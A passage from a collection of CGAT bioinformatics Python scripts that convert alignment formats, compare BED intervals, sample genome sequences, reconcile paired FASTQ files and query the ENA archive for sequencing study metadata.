for x in blocksizes:
q.append(qp)
qp += x
psl.mQueryBlockStarts = q
psl.mSbjctBlockStarts = sbjctblockstarts
psl.mQueryLength = sum(psl.mBlockSizes)
if fasta:
psl.mSbjctLength = fasta.getLength(bed.contig)
options.stdout.write("%s\n" % str(psl))
noutput += 1
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/cat_tables.py
```python
import sys
import fileinput
import CGAT.Experiment as E
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id: cgat_script_template.py 2781 2009-09-10 11:33:14Z andreas $", usage=globals()["__doc__"])
parser.set_defaults(
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(args) == 0 or (len(args) == 1 and args[0] == "-"):
infile = options.stdin
else:
infile = fileinput.FileInput(args)
# do sth
ninput, nskipped, noutput = 0, 0, 0
header = False
for line in infile:
ninput += 1
if line.startswith("#"):
pass
elif not header:
header = line
elif line == header:
nskipped += 1
continue
options.stdout.write(line)
noutput += 1
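    # Sketch of the effect (hypothetical input): concatenating two files that
    # both start with "gene_id<tab>count" emits that header line once and skips
    # the second, identical header, while all data rows are passed through.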
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/chain2psl.py
```python
import sys
import CGAT.Experiment as E
import CGAT.Blat as Blat
import alignlib_lite
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# do sth
ninput, nskipped, noutput = 0, 0, 0
psl = None
def chain_iterator(infile):
lines = []
for line in options.stdin:
if line.startswith("#"):
continue
if line.strip() == "":
continue
if line.startswith("chain"):
if lines:
yield lines
lines = []
lines.append(line)
yield lines
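    # A chain header line follows the UCSC chain format, e.g. (illustrative values):
    #   chain 4900 chrY 58368225 + 25985403 25985638 chr5 151006098 - 43257292 43257528 2
    # i.e. "chain score tName tSize tStrand tStart tEnd qName qSize qStrand qStart qEnd id";
    # the lines that follow are "size dt dq" triplets, with a bare block size on
    # the final line of each chain.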
for lines in chain_iterator(options.stdin):
ninput += 1
psl = Blat.Match()
(_,
_,
psl.mSbjctId,
target_length,
target_strand,
target_start,
target_end,
psl.mQueryId,
query_length,
query_strand,
query_start,
query_end,
alignment_id) = lines[0][:-1].split()
(psl.mQueryStart, psl.mQueryEnd, psl.mQueryLength,
psl.mSbjctStart, psl.mSbjctEnd, psl.mSbjctLength) = \
[int(x) for x in
(query_start,
query_end,
query_length,
target_start,
target_end,
target_length)]
map_query2target = alignlib_lite.py_makeAlignmentBlocks()
qstart, tstart = psl.mQueryStart, psl.mSbjctStart
for line in lines[1:-1]:
size, dt, dq = [int(x) for x in line[:-1].split()]
map_query2target.addDiagonal(qstart,
qstart + size,
tstart - qstart)
qstart += size + dq
tstart += size + dt
size = int(lines[-1][:-1])
map_query2target.addDiagonal(qstart,
qstart + size,
tstart - qstart)
psl.fromMap(map_query2target)
# sort out strand
# target_strand is always positive
assert(target_strand == "+")
# if query strand is negative
if query_strand == "-":
# invert both query and target
psl.switchTargetStrand()
# manually invert the query coordinates
psl.mQueryFrom, psl.mQueryTo = psl.mQueryLength - \
psl.mQueryTo, psl.mQueryLength - psl.mQueryFrom
options.stdout.write("%s\n" % psl)
noutput += 1
E.info("ninput=%i, noutput=%i, nskipped=%i" % (ninput, noutput, nskipped))
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/contigs2random_sample.py
```python
import os
import sys
import optparse
import glob
import random
import CGAT.Experiment as E
import CGAT.FastaIterator as FastaIterator
import CGAT.IOTools as IOTools
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = optparse.OptionParser(version="%prog version: $Id: contigs2random_sample.py 2871 2010-03-03 10:20:44Z nicki $",
usage=globals()["__doc__"])
parser.add_option("-m", "--species-map", dest="species_map", type="string",
help="text file specifying the mapping between contig and genome")
parser.add_option("-g", "--genome-dir", dest="genome_dir", type="string",
help="specify directory where genome / genomes are stored")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# read in contig lengths into dictionary
E.info("reading contigs file")
c_contigs = 0
contigs_lengths = {}
for fasta in FastaIterator.iterate(options.stdin):
c_contigs += 1
# titles of fasta records must be single strings with no special
# characters
contigs_lengths[fasta.title.split(" ")[0]] = len(fasta.sequence)
E.info("read %i contigs" % c_contigs)
# read in mapping between spcies and contigs
species_map = {}
for line in open(options.species_map).readlines():
data = line[:-1].split("\t")
contig, species = data[0], data[1]
species_map[contig] = species
# read genomes into memory
# NB this may need optimisin if using large
# genomes or many genomes
E.info("reading genomes from %s" % options.genome_dir)
# The directory must ONLY contain genome files!!
genomes_sequences = {}
c_genomes = 0
for genome_file in glob.glob(os.path.join(options.genome_dir, "*")):
c_genomes += 1
for fasta in FastaIterator.iterate(IOTools.openFile(genome_file)):
genomes_sequences[fasta.title] = fasta.sequence
E.info("read %i genomes from %s" % (c_genomes, options.genome_dir))
# iterate over the contigs and sample from the respective genome
E.info("iterating over contigs")
c_contigs_output = 0
for contig, length in contigs_lengths.iteritems():
if contig not in species_map:
E.warn("contig %s not in species map file" % contig)
else:
c_contigs_output += 1
genome = species_map[contig]
genome_length = len(genomes_sequences[genome])
# get the start position from which to sample
start = random.randint(1, genome_length)
            end = start + length - 1
            if end > genome_length:
                E.warn("end of sampled contig extends beyond length of genome")
sampled_seq = genomes_sequences[genome][start:end]
options.stdout.write(
">%s_random\n%s\n" % (contig + "_%s" % species_map[contig], sampled_seq))
E.info("written %i contigs" % c_contigs_output)
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/csv_intersection.py
```python
import sys
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import CGAT.CSV as CSV
import csv
import hashlib
class UniqueBuffer:
    def __init__(self, outfile):
        self.mOutfile = outfile
        self.mKeys = {}
    def write(self, out):
        key = hashlib.md5(out).digest()
        if key not in self.mKeys:
            self.mKeys[key] = True
            self.mOutfile.write(out)
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
parser = E.OptionParser(
version="%prog version: $Id: csv_intersection.py 2782 2009-09-10 11:40:29Z andreas $")
parser.add_option("-u", "--unique", dest="unique", action="store_true",
help="output rows are uniq.")
parser.set_defaults(
remove=False,
unique=False,
)
(options, args) = E.Start(parser, add_csv_options=True)
if len(args) != 2:
raise "please specify two files to join."
options.filename1, options.filename2 = args
table1 = CSV.readTable(IOTools.openFile(options.filename1, "r"))
table2 = CSV.readTable(IOTools.openFile(options.filename2, "r"))
if options.unique:
outfile = UniqueBuffer(sys.stdout)
else:
outfile = options.stdout
# build new field list
new_fields = []
for x in options.join_fields1:
new_fields.append(x)
for x in fields1:
if x not in options.join_fields1:
new_fields.append(x)
if x not in options.join_fields2:
new_fields.append(x)
writer = csv.DictWriter(outfile,
fields,
dialect=options.csv_dialect,
lineterminator=options.csv_lineterminator,
extrasaction='ignore')
if len(lines) > 0:
old_fields = lines[0][:-1].split("\t")
if options.remove:
fields = []
for x in old_fields:
if x not in input_fields:
fields.append(x)
else:
fields = input_fields
reader = csv.DictReader(lines,
dialect=options.csv_dialect)
print "\t".join(fields)
first_row = True
for row in reader:
row = IOTools.convertDictionary(row)
writer.writerow(row)
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/data2resamples.py
```python
import sys
import pandas as pd
import CGAT.Experiment as E
import CGAT.Timeseries as TS
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-t", "--test", dest="test", type="string",
help="supply help")
parser.add_option("--time", dest="timepoints", type="string",
help="a comma-separated list of time points measured")
parser.add_option("--replicates", dest="reps", type="string",
help="a comma-separated list of replicate IDs")
parser.add_option("--condition", dest="condition", type="string",
help="experimental condition")
parser.add_option("--resamples", dest="resamples", type="string",
help="number of times to resample replicates to"
" generate pseudo datasets")
parser.add_option("--input-gtf", dest="gtf_file", type="string",
help="reference gtf file")
parser.add_option("--output-file-directory", dest="output_dir",
type="string", help="directory to output"
" resampled files to")
parser.add_option("--seed", dest="seed", type="string",
help="seed for pseudo-random number generator")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
try:
infile = argv[-1]
open(infile, "r")
except IOError:
infile = options.stdin
data_frame = pd.read_table(infile,
sep="\t",
index_col=0,
header=0)
time_str = options.timepoints.split(",")
time_points = [int(x) for x in time_str]
replicates = options.reps.split(",")
reps = int(options.resamples)
its = [time_str, replicates]
midx = pd.MultiIndex.from_product(its,
names=['times', 'replicates'])
TS.genResampleData(data_frame=data_frame,
multiple_index=midx,
replicates=reps,
sample_reps=replicates,
times=time_points,
condition=options.condition,
ref_gtf=options.gtf_file,
out_dir=options.output_dir,
seed=int(options.seed))
# Write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/diff_bed.py
```python
import sys
import re
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
import CGAT.Bed as Bed
import numpy
class Counter:
mPercentFormat = "%5.2f"
def __init__(self):
pass
def getHeader(self):
h = []
for a in ("exons", "bases"):
for b in ("total", "ovl", "unique"):
for c in ("1", "2"):
h.append("n" + a + "_" + b + c)
for a in ("exons", "bases"):
for b in ("ovl", "unique"):
for c in ("1", "2"):
h.append("p" + a + "_" + b + c)
return "\t".join(h)
@E.cachedmethod
def buildIndex(self, filename):
return Bed.readAndIndex(IOTools.openFile(filename, "r"))
def _count(self, filename, idx):
'''count filename against idx.'''
overlapping_genes = set()
genes = set()
# iterate over exons
infile = IOTools.openFile(filename, "r")
it = Bed.bed_iterator(infile)
nexons, nexons_overlapping = 0, 0
nbases, nbases_overlapping = 0, 0
for this in it:
nexons += 1
nbases += this.end - this.start
try:
intervals = list(
idx[this.contig].find(max(0, this.start), this.end))
except KeyError:
continue
except Exception, msg:
raise Exception(
"error while processing %s, msg=%s" % (filename, msg))
if len(intervals) == 0:
continue
nexons_overlapping += 1
start, end = this.start, this.end
counts = numpy.zeros(end - start, numpy.int)
for other_start, other_end, other_value in intervals:
for x in range(max(start, other_start) - start, min(end, other_end) - start):
counts[x] += 1
nbases_overlapping += sum([1 for x in counts if x > 0])
infile.close()
return nexons, nexons_overlapping, nbases, nbases_overlapping
def count(self, filename1, filename2):
"""count overlap between two bed files."""
E.info("counting started for %s versus %s" % (filename1, filename2))
idx2 = self.buildIndex(filename2)
(self.mExons1, self.mExonsOverlapping1,
self.mBases1, self.mBasesOverlapping1 ) = \
self._count(filename1, idx2)
self.mExonsUnique1 = self.mExons1 - self.mExonsOverlapping1
self.mBasesUnique1 = self.mBases1 - self.mBasesOverlapping1
idx1 = self.buildIndex(filename1)
(self.mExons2, self.mExonsOverlapping2,
self.mBases2, self.mBasesOverlapping2 ) = \
self._count(filename2, idx1)
self.mExonsUnique2 = self.mExons2 - self.mExonsOverlapping2
self.mBasesUnique2 = self.mBases2 - self.mBasesOverlapping2
def __str__(self):
return "\t".join(map(str, (
self.mExons1, self.mExons2,
self.mExonsOverlapping1, self.mExonsOverlapping2,
self.mExonsUnique1, self.mExonsUnique2,
self.mBases1, self.mBases2,
self.mBasesOverlapping1, self.mBasesOverlapping2,
self.mBasesUnique1, self.mBasesUnique2 ) ) ) + "\t" +\
"\t".join(map(lambda x: IOTools.prettyPercent(*x), (
(self.mExonsOverlapping1, self.mExons1),
(self.mExonsOverlapping2, self.mExons2),
(self.mExonsUnique1, self.mExons1),
(self.mExonsUnique2, self.mExons2),
(self.mBasesOverlapping1, self.mBases1),
(self.mBasesOverlapping2, self.mBases2),
(self.mBasesUnique1, self.mBases1),
(self.mBasesUnique2, self.mBases2))))
class CounterTracks(Counter):
def __init__(self, filename):
self.mIndices = Bed.readAndIndex(IOTools.openFile(filename, "r"),
per_track=True)
def getTracks(self):
return sorted(self.mIndices.keys())
def _countIndices(self, idx_in, idx):
'''count filename against idx.'''
overlapping_genes = set()
genes = set()
# iterate over exons
nexons, nexons_overlapping = 0, 0
nbases, nbases_overlapping = 0, 0
for contig, ix in idx_in.iteritems():
# note: add a findall function to ncl
for start, end, value in ix.find(0, 1000000000):
nexons += 1
nbases += end - start
try:
intervals = list(idx[contig].find(start, end))
except KeyError:
continue
if len(intervals) == 0:
continue
nexons_overlapping += 1
counts = numpy.zeros(end - start, numpy.int)
for other_start, other_end, other_value in intervals:
for x in range(max(start, other_start) - start, min(end, other_end) - start):
counts[x] += 1
nbases_overlapping += sum([1 for x in counts if x > 0])
return nexons, nexons_overlapping, nbases, nbases_overlapping
def count(self, filename, track):
"""count overlap between two gtf files."""
E.info("counting started for %s versus %s" % (filename, track))
(self.mExons1, self.mExonsOverlapping1,
self.mBases1, self.mBasesOverlapping1 ) = \
self._count(filename, self.mIndices[track])
self.mExonsUnique1 = self.mExons1 - self.mExonsOverlapping1
self.mBasesUnique1 = self.mBases1 - self.mBasesOverlapping1
idx = self.buildIndex(filename)
# count index against index
(self.mExons2, self.mExonsOverlapping2,
self.mBases2, self.mBasesOverlapping2 ) = \
self._countIndices(self.mIndices[track], idx)
self.mExonsUnique2 = self.mExons2 - self.mExonsOverlapping2
self.mBasesUnique2 = self.mBases2 - self.mBasesOverlapping2
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(
version="%prog version: $Id: diff_bed.py 2866 2010-03-03 10:18:49Z andreas $", usage=globals()["__doc__"])
parser.add_option("-u", "--update", dest="filename_update", type="string",
help="if filename is given, previous results will be read from there and only changed sets will be computed [default=%default].")
parser.add_option("-p", "--pattern-identifier", dest="pattern_id", type="string",
help="pattern to convert a filename to an id [default=%default].")
parser.add_option("-t", "--tracks", dest="tracks", action="store_true",
help="compare files against all tracks in the first file [default=%default]")
parser.set_defaults(
filename_update=None,
pattern_id="(.*).bed",
tracks=None,
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(args) < 2:
raise ValueError("at least two arguments required")
if options.filename_update:
infile = IOTools.openFile(options.filename_update, "r")
previous_results = {}
for line in infile:
if line.startswith("#"):
continue
if line.startswith("set1"):
continue
data = line[:-1].split("\t")
set1, set2 = data[0], data[1]
if set1 not in previous_results:
previous_results[set1] = {}
if set2 not in previous_results:
previous_results[set2] = {}
previous_results[set1][set2] = "\t".join(data[2:])
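            # the remaining columns come in pairs (value for set1, value for
            # set2); swapping each pair gives the same comparison seen from the
            # other direction, so the cached result can also be reused for
            # (set2, set1) without recomputing it.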
rev = [(data[x + 1], data[x]) for x in range(2, len(data), 2)]
previous_results[set2][set1] = "\t".join(IOTools.flatten(rev))
else:
previous_results = {}
pattern_id = re.compile(options.pattern_id)
def getTitle(x):
try:
return pattern_id.search(x).groups()[0]
except AttributeError:
return x
ncomputed, nupdated = 0, 0
if options.tracks:
counter = CounterTracks(args[0])
options.stdout.write("set1\tset2\t%s\n" % counter.getHeader())
for filename in args[1:]:
title1 = getTitle(filename)
for title2 in counter.getTracks():
if previous_results:
try:
prev = previous_results[title1][title2]
except KeyError:
pass
else:
options.stdout.write(
"%s\t%s\t%s\n" % ((title1, title2, prev)))
nupdated += 1
continue
counter.count(filename, title2)
options.stdout.write(
"%s\t%s\t%s\n" % ((title1, title2, str(counter))))
ncomputed += 1
else:
counter = Counter()
options.stdout.write("set1\tset2\t%s\n" % counter.getHeader())
for x in range(len(args)):
title1 = getTitle(args[x])
for y in range(0, x):
title2 = getTitle(args[y])
if previous_results:
try:
prev = previous_results[title1][title2]
except KeyError:
pass
else:
options.stdout.write(
"%s\t%s\t%s\n" % ((title1, title2, prev)))
nupdated += 1
continue
counter.count(args[x], args[y])
options.stdout.write(
"%s\t%s\t%s\n" % ((title1, title2, str(counter))))
ncomputed += 1
E.info("nupdated=%i, ncomputed=%i" % (nupdated, ncomputed))
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/diffgene2venn.py
```python
import sys
import CGAT.Experiment as E
import CGAT.Timeseries as TS
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if argv is None:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-t", "--test", dest="test", type="string",
help="supply help")
parser.add_option("--alpha", dest="alpha", type="string",
help="false positive rate for differentially"
" expressed genes")
parser.add_option("--file-list", dest="infiles", type="string",
help="comma separated list of input files")
parser.add_option("--output-directory", dest="out_dir", type="string",
help="output directory for png images")
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
infiles = options.infiles.split(",")
TS.genSigGenes(file_list=infiles,
alpha=float(options.alpha),
out_dir=options.out_dir)
# Write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/ena2table.py
```python
import sys
import urllib2
import urllib
import collections
import xml.etree.ElementTree as ET
import CGAT.Experiment as E
import CGAT.IOTools as IOTools
from Bio import Entrez
# mapping various combinations of library_source and selection
# to an experiment type
MAP_CODE2DESIGN = \
{
("CAGE", "TRANSCRIPTOMIC"): 'CAGE',
("ChIP", "GENOMIC"): "ChIP-Seq",
("DNase", "GENOMIC"): "DNase-Seq",
("Hybrid Selection", "GENOMIC"): "Exome-Seq",
("cDNA", "TRANSCRIPTOMIC"): "RNA-Seq",
("PCR", "GENOMIC"): "Genome-Seq",
}
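# Illustrative lookup: the code below uses
# MAP_CODE2DESIGN.get((library_selection, library_source), "other"), so
# ("ChIP", "GENOMIC") maps to "ChIP-Seq" while an unlisted combination such as
# ("RANDOM", "GENOMIC") falls back to "other".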
# all other:
# ChIP OTHER 45
# ChIP TRANSCRIPTOMIC 17
# DNase TRANSCRIPTOMIC 133
# "Hybrid Selection" TRANSCRIPTOMIC 8
# "MBD2 protein methyl-CpG binding domain" GENOMIC 238
# MDA GENOMIC 340
# MNase GENOMIC 316
# PCR GENOMIC 1829
# PCR METAGENOMIC 56
# PCR OTHER 12
# PCR SYNTHETIC 8
# PCR TRANSCRIPTOMIC 73
# RACE TRANSCRIPTOMIC 4
# RANDOM GENOMIC 51129
# RANDOM METAGENOMIC 158
# RANDOM METATRANSCRIPTOMIC 2
# RANDOM "NON GENOMIC" 37
# RANDOM OTHER 55
# RANDOM TRANSCRIPTOMIC 751
# "RANDOM PCR" GENOMIC 172
# "RANDOM PCR" TRANSCRIPTOMIC 41
# RT-PCR GENOMIC 3
# RT-PCR "NON GENOMIC" 8
# RT-PCR TRANSCRIPTOMIC 126
# "Reduced Representation" GENOMIC 442
# "Restriction Digest" GENOMIC 87
# cDNA GENOMIC 63
# cDNA METATRANSCRIPTOMIC 2
# cDNA "NON GENOMIC" 73
# cDNA OTHER 431
# other GENOMIC 2845
# other METAGENOMIC 16
# other OTHER 306
# other SYNTHETIC 2756
# other TRANSCRIPTOMIC 428
# "padlock probes capture method" GENOMIC 61
# "size fractionation" GENOMIC 121
# "size fractionation" METAGENOMIC 8
# "size fractionation" OTHER 2
# "size fractionation" TRANSCRIPTOMIC 1303
# unspecified GENOMIC 5138
# unspecified OTHER 50
# unspecified SYNTHETIC 14
# unspecified TRANSCRIPTOMIC 337
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id: cgat_script_template.py 2871 2010-03-03 10:20:44Z andreas $",
usage=globals()["__doc__"])
parser.add_option("--library-source", dest="library_source", type="string",
help="supply help")
parser.add_option("--library-selection", dest="library_selection", type="string",
help="supply help")
parser.add_option("--tax-identifier", dest="tax_id", type="int",
help="supply help")
parser.set_defaults(library_source=None,
library_selection=None,
tax_id=9606)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
# tree = ET.parse('/ifs/home/andreas/ena.xml')
# root = tree.getroot()
# for study in root.findall("STUDY"):
# alias = study.attrib["alias"]
# center_name = study.attrib["center_name"]
# accession = study.attrib["accession"]
# try:
# description = study.find("*/STUDY_DESCRIPTION").text
# description = description.encode('ascii', 'ignore')
# except AttributeError:
# description = ""
# options.stdout.write( "\t".join( (alias,
# accession,
# center_name,
# description ) ) + "\n")
#query_url = "http://www.ebi.ac.uk/ena/data/warehouse/search?query=%22tax_eq%289606%29%20AND%20library_source=%22TRANSCRIPTOMIC%22%20AND%20%28instrument_model=%22Illumina%20Genome%20Analyzer%20II%22%20OR%20instrument_model=%22Illumina%20Genome%20Analyzer%22%20OR%20instrument_model=%22Illumina%20Genome%20Analyzer%20IIx%22%20OR%20instrument_model=%22Illumina%20HiScanSQ%22%20OR%20instrument_model=%22Illumina%20HiSeq%201000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202500%22%29%22&domain=read&download=txt"
#query_url = "http://www.ebi.ac.uk/ena/data/view/search?query=%22tax_eq%289606%29%20AND%20library_source=%22TRANSCRIPTOMIC%22%20AND%20%28instrument_model=%22Illumina%20Genome%20Analyzer%20II%22%20OR%20instrument_model=%22Illumina%20Genome%20Analyzer%22%20OR%20instrument_model=%22Illumina%20Genome%20Analyzer%20IIx%22%20OR%20instrument_model=%22Illumina%20HiScanSQ%22%20OR%20instrument_model=%22Illumina%20HiSeq%201000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202500%22%29%22&domain=read&download=txt"
#query_url = "http://www.ebi.ac.uk/ena/data/warehouse/search?query=%22(instrument_model=%22Illumina%20HiSeq%202000%22%20OR%20instrument_model=%22Illumina%20HiSeq%201000%22%20OR%20instrument_model=%22Illumina%20HiSeq%202500%22)%20AND%20library_layout=%22PAIRED%22%20AND%20library_source=%22TRANSCRIPTOMIC%22%22&domain=read"
# query_url = "http://www.ebi.ac.uk/ena/data/view/A00145&display=xml"
query_url = "http://www.ebi.ac.uk/ena/data/warehouse/search"
data_url = "http://www.ebi.ac.uk/ena/data/view"
#params = None
# query_url = "http://www.ebi.ac.uk/ena/data/view/DRP000011&display=xml"
fields = ['base_count',
'read_count',
'instrument_model',
'scientific_name',
'library_layout',
'library_source',
'library_strategy',
'library_selection',
'experiment_accession',
'experiment_title',
'study_accession',
'study_title',
'first_public',
'submission_accession',
'center_name',
]
query = 'tax_eq(%i) AND instrument_platform="ILLUMINA"' % (options.tax_id)
if options.library_source:
query += ' AND library_source="%s" ' % options.library_source
if options.library_selection:
query += ' AND library_selection="%s" ' % options.library_selection
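    # Illustrative resulting query (assuming --library-source=TRANSCRIPTOMIC
    # and the default tax id):
    #   tax_eq(9606) AND instrument_platform="ILLUMINA" AND library_source="TRANSCRIPTOMIC"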
# collect pre-study results
params = urllib.urlencode({'query': query,
'display': 'report',
'fields': ",".join(fields),
'result': 'read_run'})
E.debug("?".join((query_url, params)))
lines = urllib2.urlopen(query_url, params)
header = lines.readline()
fields.insert(0, 'run_accession')
DATA = collections.namedtuple("DATA", fields)
fields.append("read_length")
fields.append("design")
table_study = options.stdout # IOTools.openFile( "study.tsv", "w" )
table_study.write("\t".join(fields) + "\n")
# collect a list of all studies
studies = set()
for line in lines:
# line endings are \r\n for data, but only \n for header
line = line[:-2]
data = DATA(*line.split("\t"))
try:
read_length = float(data.base_count) / float(data.read_count)
except ValueError:
read_length = 0
if data.library_layout == "PAIRED":
read_length /= 2.0
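        # Illustrative arithmetic (assumed numbers): a base_count of
        # 2,000,000,000 and a read_count of 20,000,000 give read_length 100.0;
        # for a PAIRED layout this is halved to 50.0, i.e. the per-mate length.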
design = MAP_CODE2DESIGN.get(
(data.library_selection, data.library_source),
"other")
table_study.write(
line + "\t" + str(read_length) + "\t" + design + "\n")
studies.add(data.study_accession)
table_studies = IOTools.openFile("studies.tsv", "w")
studies_fields = ["study_accession", "nreferences", "pubmed_ids"]
table_studies.write("\t".join(studies_fields) + "\n")
return
# params = urllib.urlencode( { 'display' : 'xml' } )
# url = "/".join( ( data_url, 'SRP013999') ) + "&" + params
# print urllib2.urlopen( url ).read()
for study_accession in studies:
# get additional info
params = urllib.urlencode({'display': 'xml'})
url = "/".join((data_url, study_accession)) + "&" + params
info_lines = urllib2.urlopen(url)
tree = ET.parse(info_lines)
root = tree.getroot()
pmids = []
for link in root.findall('*//XREF_LINK'):
db = link.find('DB').text
if db == "pubmed":
pmids.append(link.find('ID').text)
# get geo
geos = []
for attribute in root.findall('*//STUDY_ATTRIBUTE'):
if attribute.find('TAG').text == "GEO Accession":
geos.append(attribute.find('VALUE').text)
params = {'dbfrom': 'gds',
'db': 'pubmed',
}
geo_pmids = []
for geo in geos:
Entrez.email = "<EMAIL>"
handle = Entrez.esearch(db="gds", retmax=1, term=geo)
record = Entrez.read(handle)
uids = record['IdList']
handle.close()
for uid in uids:
record = Entrez.read(Entrez.elink(dbfrom="gds",
dbto="pubmed",
id=uid))
linksets = record[0]["LinkSetDb"]
if not linksets:
continue
assert len(linksets) == 1
for linksetdb in linksets:
geo_pmids = [x['Id'] for x in linksetdb["Link"]]
if not pmids:
pmids = geo_pmids
table_studies.write("\t".join(map(str, (
study_accession,
len(pmids),
",".join(pmids),
len(geos),
",".join(geos)))) + "\n")
# write footer and output benchmark information.
E.Stop()
if __name__ == "__main__":
sys.exit(main(sys.argv))
```
#### File: cgat/scripts/fasta2gff.py
```python
import sys
import CGAT.Experiment as E
import CGAT.IndexedFasta as IndexedFasta
import CGAT.GTF as GTF
USAGE = """python %s [OPTIONS]
Version: $Id: fasta2gff.py 2861 2010-02-23 17:36:32Z andreas $
""" % sys.argv[0]
def writeHeader(outfile):
outfile.write("\t".join(("contig",
"nresidues",
"ngaps",
"nseqregions",
"ngapregions",
"nA", "nC", "nG", "nT",
"nN", "nX", "nO")) + "\n")
def main(argv=None):
parser = E.OptionParser(
version="%prog version: $Id: fasta2gff.py 2861 2010-02-23 17:36:32Z andreas $")
parser.add_option("-g", "--genome-file", dest="genome_file", type="string",
help="filename with genome.")
parser.add_option("-a", "--as-gtf", dest="as_gtf", action="store_true",
help="output as gtf.")
parser.add_option("-f", "--fragment-size", dest="fragment_size", type="int",
help="fixed size of fragments [default=%default].")
parser.add_option("-s", "--sample-size", dest="sample_size", type="int",
help="fixed size of fragments.")
parser.set_defaults(
as_gtf=False,
genome_file=None,
fragment_size=1000,
sample_size=10000,
pattern_id="%08i",
)
(options, args) = E.Start(parser)
fasta = IndexedFasta.IndexedFasta(options.genome_file)
contigs = fasta.getContigSizes()
if options.as_gtf:
entry = GTF.Entry()
else:
entry = GTF.Entry()
n = 0
entry.feature = "exon"
entry.source = "random"
for x in range(options.sample_size):
entry.contig, entry.strand, entry.start, entry.end = fasta.getRandomCoordinates(
options.fragment_size)
if entry.strand == "-":
l = contigs[entry.contig]
entry.start, entry.end = l - entry.end, l - entry.start
if options.as_gtf:
entry.gene_id = options.pattern_id % n
entry.transcript_id = entry.gene_id
options.stdout.write(str(entry) + "\n")
n += 1
E.Stop()
if __name__ == "__main__":
sys.exit(main())
```
#### File: cgat/scripts/fastqs2fastqs.py
```python
import sys
import re
import CGAT.IOTools as IOTools
import CGAT.Experiment as E
class PatternGetter:
def __init__(self, pattern):
self.pattern = re.compile(pattern)
def __call__(self, id):
return self.pattern.search(id).groups()[0]
def plain_getter(id):
return id
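# Illustrative use (assumed pattern): PatternGetter(r"(\S+)\.[12]$") maps an
# id such as "READ001.1" to "READ001", so both mates of a pair share the same
# key, while plain_getter returns the id unchanged.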
def main(argv=None):
"""script main.
parses command line options in sys.argv, unless *argv* is given.
"""
if not argv:
argv = sys.argv
# setup command line parser
parser = E.OptionParser(version="%prog version: $Id$",
usage=globals()["__doc__"])
parser.add_option("-m", "--method", dest="method", type="choice",
choices=('reconcile',),
help="method to apply [default=%default].")
parser.add_option(
"-c", "--chop-identifier", dest="chop", action="store_true",
help="whether or not to trim last character of the "
"sequence name. For example sometimes ids in the first "
"file in the pair will end with \1 and the second "
"with \2. If --chop-identifier is not specified "
"then the results will be wrong [default=%default].")
parser.add_option(
"-u", "--unpaired", dest="unpaired", action="store_true",
help="whether or not to write out unpaired reads "
"to a separate file")
parser.add_option(
"--id-pattern-1", dest="id_pattern_1",
help="If specified will use the first group from the"
"pattern to determine the ID for the first read",
default=None)
parser.add_option(
"--id-pattern-2", dest="id_pattern_2",
help="As above but for read 2",
default=None)
parser.add_option(
"-o", "--output-filename-pattern",
dest="output_pattern", type="string",
help="pattern for output files [default=%default].")
parser.set_defaults(
method="reconcile",
chop=False,
unpaired=False,
output_pattern="%s.fastq.gz",
)
# add common options (-h/--help, ...) and parse command line
(options, args) = E.Start(parser, argv=argv)
if len(args) != 2:
raise ValueError(
"please supply at least two fastq files on the commandline")
fn1, fn2 = args
c = E.Counter()
if options.id_pattern_1:
id1_getter = PatternGetter(options.id_pattern_1)
else:
id1_getter = plain_getter
if options.id_pattern_2:
